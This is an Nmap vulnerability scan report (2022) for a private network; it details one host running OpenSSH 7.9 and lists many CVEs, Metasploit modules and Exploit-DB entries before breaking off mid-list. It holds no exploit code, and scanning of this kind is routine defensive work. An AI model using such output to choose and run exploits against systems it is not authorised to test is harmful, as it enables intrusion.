Nmap Scan Report - Scanned at Mon Jun 20 05:02:37 2022

Scan Summary

Nmap 7.92 was initiated at Mon Jun 20 05:02:37 2022 with these arguments:
nmap -v --script-updatedb -sV --version-all --script vuln,vulscan/ -iL ips.txt --max-retries 0 -oX nmap-ping-scan-VULN.xml

Verbosity: 1; Debug level 0

Nmap done at Mon Jun 20 05:16:48 2022; 10 IP addresses (10 hosts up) scanned in 851.51 seconds

192.168.2.1(online)

Address

192.168.2.1 (ipv4)
00:0C:29:A0:B9:3F - VMware (mac)

Ports

The 996 ports scanned but not shown below are in state: filtered

996 ports replied with: no-response

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
22	tcp	open	ssh	syn-ack	OpenSSH	7.9	protocol 2.0
	vulners	cpe:/a:openbsd:openssh:7.9: MSF:ILITIES/UBUNTU-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-25017/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ EXPLOIT MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ EXPLOIT MSF:ILITIES/IBM-AIX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ EXPLOIT EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 EXPLOIT EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 EXPLOIT EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 EXPLOIT EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 EXPLOIT CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 EXPLOIT 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 EXPLOIT CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 CVE-2019-16905 4.4 https://vulners.com/cve/CVE-2019-16905 MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ EXPLOIT CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 EXPLOIT
	vulscan	VulDB - https://vuldb.com: [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config privilege escalation [130370] OpenSSH 7.9 privilege escalation [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter privilege escalation [129007] OpenSSH 7.9 scp Client scp.c privilege escalation [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c Username information disclosure [123011] OpenSSH up to 7.7 auth2-gss.c information disclosure [112267] OpenSSH up to 7.3 sshd kex.c/packet.c denial of service [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open privilege escalation [94611] OpenSSH up to 7.3 Access Control privilege escalation [94610] OpenSSH up to 7.3 Shared Memory Manager memory corruption [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation [90671] OpenSSH up to 7.2 auth-passwd.c auth_password privilege escalation [90405] OpenSSH up to 7.2p2 sshd information disclosure [90404] OpenSSH up to 7.2p2 sshd information disclosure [90403] OpenSSH up to 7.2p2 sshd denial of service [89622] OpenSSH 7.2p2 Authentication Username information disclosure [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation [80656] OpenBSD OpenSSH 7.1 X11 Forwarding 7PK Security Features [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption MITRE CVE - https://cve.mitre.org: [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding [10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation 